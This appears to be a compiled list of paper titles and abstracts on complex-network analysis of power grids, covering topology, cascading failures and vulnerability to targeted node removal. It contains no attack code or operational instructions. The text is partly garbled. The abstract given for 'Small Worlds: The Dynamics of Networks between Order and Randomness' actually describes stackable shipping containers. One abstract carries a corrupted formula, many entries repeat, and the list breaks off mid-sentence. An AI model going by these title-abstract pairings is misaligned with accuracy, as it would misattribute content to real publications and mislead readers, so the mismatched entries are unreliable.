In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Cascade-based attack vulnerability on the US power grid paper_content: The vulnerability of real-life networks subject to intentional attacks has been one of the outstanding challenges in the study of the network safety. Applying the real data of the US power grid, we compare the effects of two different attacks for the network robustness against cascading failures, i.e., removal by either the descending or ascending orders of the loads. Adopting the initial load of a node j to be Lj !" kj# Rm2Cj km$% a with kj and Cj being the degree of the node j and the set of its neighboring nodes, respectively, where a is a tunable parameter and governs the strength of the initial load of a node, we investigate the response of the US power grid under two attacks during the cascading propagation. In the case of a < 0:7, our investigation by the numerical simulations leads to a counterintuitive finding on the US power grid that the attack on the nodes with the lowest loads is more harmful than the attack on the ones with the highest loads. In addition, the almost same effect of two attacks in the case ofa ! 0:7 may be useful in furthering studies on the control and defense of cascading failures in the US power grid. --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Modeling Cascading Failures in the North American Power Grid paper_content: The North American power grid is one of the most complex technological networks, and its interconnectivity allows both for long-distance power transmission and for the propagation of disturbances. We model the power grid using its actual topology and plausible assumptions about the load and overload of transmission substations. Our results indicate that the loss of a single substation can result in up to \(25\%\) loss of transmission efficiency by triggering an overload cascade in the network. The actual transmission loss depends on the overload tolerance of the network and the connectivity of the failed substation. We systematically study the damage inflicted by the loss of single nodes, and find three universal behaviors, suggesting that \(40\%\) of the transmission substations lead to cascading failures when disrupted. While the loss of a single node can inflict substantial damage, subsequent removals have only incremental effects, in agreement with the topological resilience to less than \(1\%\) node loss. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Assessing European power grid reliability by means of topological measures paper_content: Publicat originalment a: WIT transactions on ecology and the environment, 2009, vol. 121, p. 527-537 --- paper_title: The Node Degree Distribution in Power Grid and Its Topology Robustness under Random and Selective Node Removals paper_content: In this paper we numerically study the topology robustness of power grids under random and selective node breakdowns, and analytically estimate the critical node-removal thresholds to disintegrate a system, based on the available US power grid data. We also present an analysis on the node degree distribution in power grids because it closely relates with the topology robustness. It is found that the node degree in a power grid can be well fitted by a mixture distribution coming from the sum of a truncated Geometric random variable and an irregular Discrete random variable. With the findings we obtain better estimates of the threshold under selective node breakdowns which predict the numerical thresholds more correctly. --- paper_title: Power Grids as Complex Networks: Topology and Fragility paper_content: We almost certainly agree that the harnessing of electricity can be considered the most important technological advance of the twentieth century. The development that allows this control is the power grid, an intricate system composed of generators, substations and transformers connected by cable lines hundreds of kilometers long. Its presence is nowadays so intertwined with ours, and so much taken for granted, that we are only capable of sensing its absence, disguised as a cascading failure or a blackout in its extreme form. Since these extreme phenomena seem to have increased in recent years and new actors, like highly liberalized markets or environmental and social constraints, are taking a leading role, different paths other than traditional engineering ones have been explored. In the last ten years, and mainly due to increasing computational capability and accessibility to data, the conceptual frame of complex networks has allowed different approaches in order to understand the usual (and not-so-usual) outcomes of this system. This paper considers power grids as complex networks. It presents some recent results that correlate their topology with their fragility, together with major malfunctions analysis, and for the European transmission power grid in particular. --- paper_title: Identifying vulnerable lines in a power network using complex network theory paper_content: The latest developments in complex network theory have provided a new direction to power system research. Based on this theory a power system can be modelled as a graph with nodes and vertices and further analysis can help in identifying the important lines. This paper proposes a new betweenness index using the reactance of the transmission lines as the weight and criteria to measure of vulnerability of a power network. The reactance is a simplified measure of power flow in a lossless transmission line based on the power flow analysis equations. The weighted line index is defined as the reactance of the electric path taken to reach from one node to another node. More power is transmitted along the lines with less reactance, to reach from the source node to destination node, which gives the edges with less reactance a higher weight in the analysis. The analyzes have been carried out on the IEEE 39 bus system and IEEE 118 Bus System. The new betweenness index can identify the critical lines of the system, either due to their position in the network or by the power they transmit along the network. --- paper_title: Topological properties of high-voltage electrical transmission networks paper_content: The topological properties of high-voltage electrical power transmission networks in several UE countries (the Italian 380 kV, the French 400 kV and the Spanish 400 kV networks) have been studied from available data. An assessment of the vulnerability of the networks has been given by measuring the level of damage introduced by a controlled removal of links. Topological studies could be useful to make vulnerability assessment and to design specific action to reduce topological weaknesses. --- paper_title: Collective dynamics of ‘small-world’ networks paper_content: Networks of coupled dynamical systems have been used to model biological oscillators1,2,3,4, Josephson junction arrays5,6, excitable media7, neural networks8,9,10, spatial games11, genetic control networks12 and many other self-organizing systems. Ordinarily, the connection topology is assumed to be either completely regular or completely random. But many biological, technological and social networks lie somewhere between these two extremes. Here we explore simple models of networks that can be tuned through this middle ground: regular networks ‘rewired’ to introduce increasing amounts of disorder. We find that these systems can be highly clustered, like regular lattices, yet have small characteristic path lengths, like random graphs. We call them ‘small-world’ networks, by analogy with the small-world phenomenon13,14 (popularly known as six degrees of separation15). The neural network of the worm Caenorhabditis elegans, the power grid of the western United States, and the collaboration graph of film actors are shown to be small-world networks. Models of dynamical systems with small-world coupling display enhanced signal-propagation speed, computational power, and synchronizability. In particular, infectious diseases spread more easily in small-world networks than in regular lattices. --- paper_title: Topological analysis of the power grid and mitigation strategies against cascading failures paper_content: This paper presents a complex systems overview of a power grid network. In recent years, concerns about the robustness of the power grid have grown because of several cascading outages in different parts of the world. In this paper, cascading effect has been simulated on three different networks, the IEEE 300 bus test system, the IEEE 118 bus test system, and the WSCC 179 bus equivalent model. Power Degradation has been discussed as a measure to estimate the damage to the network, in terms of load loss and node loss. A network generator has been developed to generate graphs with characteristics similar to the IEEE standard networks and the generated graphs are then compared with the standard networks to show the effect of topology in determining the robustness of a power grid. Three mitigation strategies, Homogeneous Load Reduction, Targeted Range-Based Load Reduction, and Use of Distributed Renewable Sources in combination with Islanding, have been suggested. The Homogeneous Load Reduction is the simplest to implement but the Targeted Range-Based Load Reduction is the most effective strategy. --- paper_title: Topological analysis of eastern region of Indian power grid paper_content: The modern power grid is tending towards more complexity as power has become an integral part of life even in remote location. Thus the vulnerability of such grids has become more prominent; necessitating some simulation based modeling to extract some important features for such sprawling network. The spatial structure of the power grid has been used for topological analysis of the power grid. The case studies pertaining to eastern region power grid of India validate such approach. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: TOPOLOGICAL VULNERABILITY OF THE EUROPEAN POWER GRID UNDER ERRORS AND ATTACKS paper_content: We present an analysis of the topological structure and static tolerance to errors and attacks of the September 2003 actualization of the Union for the Coordination of Transport of Electricity (UCTE) power grid, involving thirty-three different networks. Though every power grid studied has exponential degree distribution and most of them lack typical small-world topology, they display patterns of reaction to node loss similar to those observed in scale-free networks. We have found that the node removal behavior can be logarithmically related to the power grid size. This logarithmic behavior would suggest that, though size favors fragility, growth can reduce it. We conclude that, with the ever-growing demand for power and reliability, actual planning strategies to increase transmission systems would have to take into account this relative increase in vulnerability with size, in order to facilitate and improve the power grid design and functioning. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: TOPOLOGY AND CASCADING LINE OUTAGES IN POWER GRIDS paper_content: Motivated by the small world network research of Watts & Strogatz, this paper studies relationships between topology and cascading line outages in electric power grids. Cascading line outages are a type of cascading collapse that can occur in power grids when the transmission network is congested. It is characterized by a self-sustaining sequence of line outages followed by grid breakup, which generally leads to widespread blackout. The main findings of this work are twofold: On one hand, the work suggests that topologies with more disorder in their interconnection topology tend to be robust with respect to cascading line outages in the sense of being able to support greater generation and demand levels than more regularly interconnected topologies. On the other hand, the work suggests that topologies with more disorder tend to be more fragile in that should a cascade get started, they tend to break apart after fewer outages than more regularly interconnected topologies. Thus, as has been observed in other complex networks, there appears to be a tradeoff between robustness and fragility. These results were established using synthetically generated power grid topologies and verified using the IEEE 57 bus and 188 bus power grid test cases. --- paper_title: Using Graph Models to Analyze the Vulnerability of Electric Power Networks paper_content: In this article, we model electric power delivery networks as graphs, and conduct studies of two power transmission grids, i.e., the Nordic and the western states (U.S.) transmission grid. We calculate values of topological (structural) characteristics of the networks and compare their error and attack tolerance (structural vulnerability), i.e., their performance when vertices are removed, with two frequently used theoretical reference networks (the Erdos-Renyi random graph and the Barabasi-Albert scale-free network). Further, we perform a structural vulnerability analysis of a fictitious electric power network with simple structure. In this analysis, different strategies to decrease the vulnerability of the system are evaluated. Finally, we present a discussion on the practical applicability of graph modeling. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Evaluating North American Electric Grid Reliability Using the Barabasi-Albert Network Model paper_content: The reliability of electric transmission systems is examined using a scale-free model of network topology and failure propagation. The topologies of the North American eastern and western electric grids are analyzed to estimate their reliability based on the Barabasi–Albert network model. A commonly used power system reliability index is computed using a simple failure propagation model. The results are compared to the values of power system reliability indices previously obtained using standard power engineering methods, and they suggest that scale-free network models are usable to estimate aggregate electric grid reliability. --- paper_title: Analysis of weighted networks paper_content: The connections in many networks are not merely binary entities, either present or not, but have associated weights that record their strengths relative to one another. Recent studies of networks have, by and large, steered clear of such weighted networks, which are often perceived as being harder to analyze than their unweighted counterparts. Here we point out that weighted networks can in many cases be analyzed using a simple mapping from a weighted network to an unweighted multigraph, allowing us to apply standard techniques for unweighted graphs to weighted ones as well. We give a number of examples of the method, including an algorithm for detecting community structure in weighted networks and a simple proof of the maximum-flow--minimum-cut theorem. --- paper_title: Model for cascading failures in complex networks. paper_content: Large but rare cascades triggered by small initial shocks are present in most of the infrastructure networks. Here we present a simple model for cascading failures based on the dynamical redistribution of the flow on the network. We show that the breakdown of a single node is sufficient to collapse the efficiency of the entire system if the node is among the ones with largest load. This is particularly important for real-world networks with a highly hetereogeneous distribution of loads as the Internet and electrical power grids. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Impact of Smart Grid on distribution system design paper_content: There has been much recent discussion on what distribution systems can and should look like in the future. Terms related to this discussion include smart grid, distribution system of the future, and others. Functionally, a smart grid should be able to provide new abilities such as self-healing, high reliability, energy management, and real-time pricing. From a design perspective, a smart grid will likely incorporate new technologies such as advanced metering, automation, communication, distributed generation, and distributed storage. This paper discussed the potential impact that issues related to smart grid will have on distribution system design. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus identifying the important topological parameters to work on to facilitate such open decentralized markets. --- paper_title: A Centrality Measure for Electrical Networks paper_content: We derive a measure of "electrical centrality" for AC power networks, which describes the structure of the network as a function of its electrical topology rather than its physical topology. We compare our centrality measure to conventional measures of network structure using the IEEE 300-bus network. We find that when measured electrically, power networks appear to have a scale-free network structure. Thus, unlike previous studies of the structure of power grids, we find that power networks have a number of highly-connected "hub" buses. This result, and the structure of power networks in general, is likely to have important implications for the reliability and security of power networks. --- paper_title: Analysis of structural vulnerabilities in power transmission grids paper_content: Abstract Power transmission grids play a crucial role as a critical infrastructure by assuring the proper functioning of power systems. In particular, they secure the loads supplied by power generation plants and help avoid blackouts that can have a disastrous impact on society. The power grid structure (number of nodes and lines, their connections, and their physical properties and operational constraints) is one of the key issues (along with generation availability) to assure power system security; consequently, it deserves special attention. A promising approach for the structural analysis of transmission grids with respect to their vulnerabilities is to use metrics and approaches derived from complex network (CN) theory that are shared with other infrastructures such as the World-Wide Web, telecommunication networks, and oil and gas pipelines. These approaches, based on metrics such as global efficiency, degree and betweenness, are purely topological because they study structural vulnerabilities based on the graphical representation of a network as a set of vertices connected by a set of edges. Unfortunately, these approaches fail to capture the physical properties and operational constraints of power systems and, therefore, cannot provide meaningful analyses. This paper proposes an extended topological approach that includes the definitions of traditional topological metrics (e.g., degrees of nodes and global efficiency) as well as the physical/operational behavior of power grids in terms of real power-flow allocation over lines and line flow limits. This approach provides two new metrics, entropic degree and net-ability, that can be used to assess structural vulnerabilities in power systems. The new metrics are applied to test systems as well as real power grids to demonstrate their performance and to contrast them with traditional, purely topological metrics. --- paper_title: The Concept of Betweenness in the Analysis of Power Grid Vulnerability paper_content: Vulnerability analysis in power systems is a key issue in modern society and many efforts have contributed to the analysis. Recently, complex network metrics applied to assess the topological vulnerability of networked systems have been used in power systems, such as betweenness metric, since transmission of power systems is in basis of a network structure. However, a pure topological approach fails to capture the specificity of power systems. This paper redefines, starting from the concept of complex networks, an electrical betweenness metric which considers several of specific features of power systems such as power transfer distribution and line flow limits. The electrical betweenness is compared with the conventional betweenness in IEEE-300 bus network according to the un-served energy after network is attacked. The results show that the tested network is more vulnerable when the components of the network are attacked according to their criticalities ranked by electrical betweenness. --- paper_title: Analyzing power network vulnerability with maximum flow based centrality approach paper_content: Complex network theory has been studied extensively in solving large scale practical problems and the recent developments have given a new direction to power system research. This theory allows modeling a power system as a network and the latest developments incorporate more and more electrical properties as opposed to the topological analysis in the past. In the past, such networks have been analyzed based on shortest path travel and betweenness index. In a power system, the power might not necessarily flow only through the shortest path so this paper proposes a centrality index based on the maximum power flow through the edges. The links which carry more portion of power from the source (generator) to sink (load) are given a higher weight in this analysis. Few simple cases have been explained and then the algorithm has been demonstrated on the IEEE 39 bus system. --- paper_title: Generating Statistically Correct Random Topologies for Testing Smart Grid Communication and Control Networks paper_content: In order to design an efficient communication scheme and examine the efficiency of any networked control architecture in smart grid applications, we need to characterize statistically its information source, namely the power grid itself. Investigating the statistical properties of power grids has the immediate benefit of providing a natural simulation platform, producing a large number of power grid test cases with realistic topologies, with scalable network size, and with realistic electrical parameter settings. The second benefit is that one can start analyzing the performance of decentralized control algorithms over information networks whose topology matches that of the underlying power network and use network scientific approaches to determine analytically if these architectures would scale well. With these motivations, in this paper we study both the topological and electrical characteristics of power grid networks based on a number of synthetic and real-world power systems. The most interesting discoveries include: the power grid is sparsely connected with obvious small-world properties; its nodal degree distribution can be well fitted by a mixture distribution coming from the sum of a truncated geometric random variable and an irregular discrete random variable; the power grid has very distinctive graph spectral density and its algebraic connectivity scales as a power function of the network size; the line impedance has a heavy-tailed distribution, which can be captured quite accurately by a clipped double Pareto lognormal distribution. Based on the discoveries mentioned above, we propose an algorithm that generates random topology power grids featuring the same topology and electrical characteristics found from the real data. --- paper_title: Do topological models provide good information about electricity infrastructure vulnerability paper_content: In order to identify the extent to which results from topological graph models are useful for modeling vulnerability in electricity infrastructure, we measure the susceptibility of power networks to random failures and directed attacks using three measures of vulnerability: characteristic path lengths, connectivity loss, and blackout sizes. The first two are purely topological metrics. The blackout size calculation results from a model of cascading failure in power networks. Testing the response of 40 areas within the Eastern U.S. power grid and a standard IEEE test case to a variety of attack/failure vectors indicates that directed attacks result in larger failures using all three vulnerability measures, but the attack-vectors that appear to cause the most damage depend on the measure chosen. While the topological metrics and the power grid model show some similar trends, the vulnerability metrics for individual simulations show only a mild correlation. We conclude that evaluating vulnerability in power ... --- paper_title: A topological analysis of the Italian electric power grid paper_content: Large-scale blackouts are an intrinsic drawback of electric power transmission grids. Here we analyze the structural vulnerability of the Italian GRTN power grid by using a model for cascading failures recently proposed in Crucitti et al. (Phys. Rev. E 69 (2004)). --- paper_title: Complex Networks Theory: A New Method of Research in Power Grid paper_content: The rapid development of complex network theory provide a new insight into the research of interconnected complex power grid. On the basis of mapping the power grid into a network graph, the topological parameters, such as degree distribution, characteristic path length, clustering coefficient etc, are introduced to describe the network structure characters. And the statistical results of these parameters in power grids of China and America are shown and analyzed. Then, small-world model are explained and simulated to the power grid. In order to measure the performance of the power grid globally and locally, the concept efficiency and its application is also introduced. The mechanism and the model of cascading failure in power grid are successively discussed. Finally, some possible directions of future research are proposed at the end of the paper --- paper_title: Vulnerability assessment of bulk power grid based on complex network theory paper_content: The vulnerability assessment algorithm of the bulk power grid based on complex network theory is proposed in this paper. The traditional research model of the power grid based on complex network theory is a graph with no direction and no weight at present. Because this model is far from the real power system, sometimes the wrong results may be gotten. In this paper, the models of components in the power grid are constructed detailedly, furthermore the weighted and directional graph is provided. First, the connecting formings among buses (instead in the traditional methods only substations are considered), lines, transformers and generators are simulated detailedly. Second, the power flow direction in the power grid is considered, and the components' tolerance to disturbances is also considered. Based on the proposed model, the power grid's tolerance to errors and attacks is analyzed. The key components and weak areas are indicated. At last, the robustness and fault dissemination mechanism of the power grid under cascading failures are analyzed based on the proposed method. The North China power grid is used as an example to validate the proposed method. --- paper_title: Suppressing cascades of load in interdependent networks paper_content: Understanding how interdependence among systems affects cascading behaviors is increasingly important across many fields of science and engineering. Inspired by cascades of load shedding in coupled electric grids and other infrastructure, we study the Bak–Tang–Wiesenfeld sandpile model on modular random graphs and on graphs based on actual, interdependent power grids. Starting from two isolated networks, adding some connectivity between them is beneficial, for it suppresses the largest cascades in each system. Too much interconnectivity, however, becomes detrimental for two reasons. First, interconnections open pathways for neighboring networks to inflict large cascades. Second, as in real infrastructure, new interconnections increase capacity and total possible load, which fuels even larger cascades. Using a multitype branching process and simulations we show these effects and estimate the optimal level of interconnectivity that balances their trade-offs. Such equilibria could allow, for example, power grid owners to minimize the largest cascades in their grid. We also show that asymmetric capacity among interdependent networks affects the optimal connectivity that each prefers and may lead to an arms race for greater capacity. Our multitype branching process framework provides building blocks for better prediction of cascading processes on modular random graphs and on multitype networks in general. --- paper_title: Small Worlds: The Dynamics of Networks between Order and Randomness. paper_content: Transport brackets are affixed to the container and include provisions for achieving transportability with either a crane or a fork lift. Variable storage capacity is provided by an extension bin which is detachably affixed as part of the container. The top and bottom of the container are compatibly configured to provide an interlock between a plurality of stacked containers and a dolly is configured for use with these interlocking provisions. The container is configured to achieve stacking interchangeability when any vertically peripheral sides are aligned and brackets are disposed around the vertical periphery of the container to achieve fork lift accessibility from any direction perpendicular to the vertically peripheral sides. --- paper_title: Robustness of the European power grids under intentional attack paper_content: The power grid defines one of the most important technological networks of our times and sustains our complex society. It has evolved for more than a century into an extremely huge and seemingly robust and well understood system. But it becomes extremely fragile as well, when unexpected, usually minimal, failures turn into unknown dynamical behaviours leading, for example, to sudden and massive blackouts. Here we explore the fragility of the European power grid under the effect of selective node removal. A mean field analysis of fragility against attacks is presented together with the observed patterns. Deviations from the theoretical conditions for network percolation (and fragmentation) under attacks are analysed and correlated with non topological reliability measures. --- paper_title: Structural vulnerability of the North American power grid paper_content: The magnitude of the August 2003 blackout affecting the United States has put the challenges of energy transmission and distribution into limelight. Despite all the interest and concerted effort, the complexity and interconnectivity of the electric infrastructure precluded us for a long time from understanding why certain events happened. In this paper we study the power grid from a network perspective and determine its ability to transfer power between generators and consumers when certain nodes are disrupted. We find that the power grid is robust to most perturbations, yet disturbances affecting key transmision substations greatly reduce its ability to function. We emphasize that the global properties of the underlying network must be understood as they greatly affect local behavior. --- paper_title: Electrical centrality measures for electric power grid vulnerability analysis paper_content: Centrality measures are used in network science to rank the relative importance of nodes and edges of a graph. Here we define new measures of centrality for power grid structure that are based on its functionality. We show that the relative importance analysis based on centrality in graph theory can be generalized to power grid network with its electrical parameters taken into account. In the paper we experiment with the proposed electrical centrality measures on the NYISO-2935 system and the IEEE 300-bus system. We analyze the centrality distribution in order to identify important nodes or branches in the system which are of essential importance in terms of system vulnerability. We also present and discuss a number of interesting discoveries regarding the importance rank of power grid nodes and branches. --- paper_title: Towards Decentralization: A Topological Investigation of the Medium and Low Voltage Grids paper_content: The traditional power grid has been designed in a hierarchical fashion, with energy pushed from the large scale production factories towards the end users. With the increasing availability of micro and medium scale generating facilities, the situation is changing. Many end users can now produce energy and share it over the power grid. Of course, end users need incentives to do so and want to act in an open decentralized energy market. In the present work, we offer a novel analysis of the medium and low voltage power grids of the North Netherlands using statistical tools from the complex network analysis field. We use a weighted model based on actual grid data and propose a set of statistical measures to evaluate the adequacy of the current infrastructure for a decentralized energy market. Further, we use the insight gained by the analysis to propose parameters that tie the statistical topological measures to economic factors that influence the attractiveness of participating in such decentralized energy market, thus 